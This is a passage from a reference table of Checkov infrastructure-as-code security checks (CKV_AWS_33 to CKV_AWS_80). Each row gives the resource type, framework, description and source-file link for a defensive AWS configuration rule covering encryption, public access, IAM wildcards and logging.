aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | -| 228 | CKV_AWS_33 | resource | AWS::KMS::Key | Ensure KMS key policy does not contain wildcard (*) principal | Cloudformation | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py) | -| 229 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | -| 230 | CKV_AWS_34 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS | Cloudformation | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py) | -| 231 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | -| 232 | CKV_AWS_35 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Cloudformation | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py) | -| 233 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | -| 234 | CKV_AWS_36 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail log file validation is enabled | Cloudformation | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py) | -| 235 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | -| 236 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | -| 237 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | -| 238 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | -| 239 | CKV_AWS_40 | resource | AWS::IAM::Policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Cloudformation | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 240 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 241 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 242 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 243 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | -| 244 | CKV_AWS_41 | resource | serverless_aws | Ensure no hard coded AWS access key and secret key exists in provider | serverless | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py) | -| 245 | CKV_AWS_42 | resource | AWS::EFS::FileSystem | Ensure EFS is securely encrypted | Cloudformation | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py) | -| 246 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | -| 247 | CKV_AWS_43 | resource | AWS::Kinesis::Stream | Ensure Kinesis Stream is securely encrypted | Cloudformation | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py) | -| 248 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | -| 249 | CKV_AWS_44 | resource | AWS::Neptune::DBCluster | Ensure Neptune storage is securely encrypted | Cloudformation | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | -| 250 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | -| 251 | CKV_AWS_45 | resource | AWS::Lambda::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 252 | CKV_AWS_45 | resource | AWS::Serverless::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 253 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 254 | CKV_AWS_46 | resource | AWS::EC2::Instance | Ensure no hard-coded secrets exist in EC2 user data | Cloudformation | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py) | -| 255 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 256 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 257 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 258 | CKV_AWS_47 | resource | AWS::DAX::Cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Cloudformation | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py) | -| 259 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | -| 260 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | -| 261 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | -| 262 | CKV_AWS_49 | resource | serverless_aws | Ensure no IAM policies documents allow "*" as a statement's actions | serverless | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py) | -| 263 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | -| 264 | CKV_AWS_51 | resource | AWS::ECR::Repository | Ensure ECR Image Tags are immutable | Cloudformation | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py) | -| 265 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | -| 266 | CKV_AWS_53 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public ACLs enabled | Cloudformation | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py) | -| 267 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) | -| 268 | CKV_AWS_54 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public policy enabled | Cloudformation | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py) | -| 269 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) | -| 270 | CKV_AWS_55 | resource | AWS::S3::Bucket | Ensure S3 bucket has ignore public ACLs enabled | Cloudformation | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py) | -| 271 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) | -| 272 | CKV_AWS_56 | resource | AWS::S3::Bucket | Ensure S3 bucket has RestrictPublicBuckets enabled | Cloudformation | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py) | -| 273 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) | -| 274 | CKV_AWS_57 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow WRITE permissions to everyone | Cloudformation | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py) | -| 275 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 276 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 277 | CKV_AWS_58 | resource | AWS::EKS::Cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Cloudformation | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py) | -| 278 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) | -| 279 | CKV_AWS_59 | resource | AWS::ApiGateway::Method | Ensure there is no open access to back-end resources through API | Cloudformation | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py) | -| 280 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) | -| 281 | CKV_AWS_60 | resource | AWS::IAM::Role | Ensure IAM role allows only specific services or principals to assume it | Cloudformation | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | -| 282 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | -| 283 | CKV_AWS_61 | resource | AWS::IAM::Role | Ensure AWS IAM policy does not allow assume role permission across all services | Cloudformation | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | -| 284 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | -| 285 | CKV_AWS_62 | resource | AWS::IAM::Group | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 286 | CKV_AWS_62 | resource | AWS::IAM::Policy | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 287 | CKV_AWS_62 | resource | AWS::IAM::Role | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 288 | CKV_AWS_62 | resource | AWS::IAM::User | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 289 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 290 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 291 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 292 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 293 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 294 | CKV_AWS_63 | resource | AWS::IAM::Group | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 295 | CKV_AWS_63 | resource | AWS::IAM::Policy | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 296 | CKV_AWS_63 | resource | AWS::IAM::Role | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 297 | CKV_AWS_63 | resource | AWS::IAM::User | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 298 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 299 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 300 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 301 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 302 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 303 | CKV_AWS_64 | resource | AWS::Redshift::Cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Cloudformation | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py) | -| 304 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) | -| 305 | CKV_AWS_65 | resource | AWS::ECS::Cluster | Ensure container insights are enabled on ECS cluster | Cloudformation | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py) | -| 306 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) | -| 307 | CKV_AWS_66 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group specifies retention days | Cloudformation | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py) | -| 308 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) | -| 309 | CKV_AWS_67 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail is enabled in all Regions | Cloudformation | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py) | -| 310 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) | -| 311 | CKV_AWS_68 | resource | AWS::CloudFront::Distribution | CloudFront Distribution should have WAF enabled | Cloudformation | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py) | -| 312 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) | -| 313 | CKV_AWS_69 | resource | AWS::AmazonMQ::Broker | Ensure Amazon MQ Broker should not have public access | Cloudformation | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py) | -| 314 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) | -| 315 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 316 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 317 | CKV_AWS_71 | resource | AWS::Redshift::Cluster | Ensure Redshift Cluster logging is enabled | Cloudformation | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py) | -| 318 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) | -| 319 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) | -| 320 | CKV_AWS_73 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) | -| 321 | CKV_AWS_73 | resource | AWS::Serverless::Api | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) | -| 322 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) | -| 323 | CKV_AWS_74 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Cloudformation | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py) | -| 324 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) | -| 325 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | -| 326 | CKV_AWS_76 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | -| 327 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | -| 328 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 329 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 330 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | -| 331 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) | -| 332 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | -| 333 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) | -| 334 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 335 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 336 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 337 | CKV_AWS_80 | resource | AWS::MSK::Cluster | Ensure MSK Cluster logging is enabled | Cloudformation | 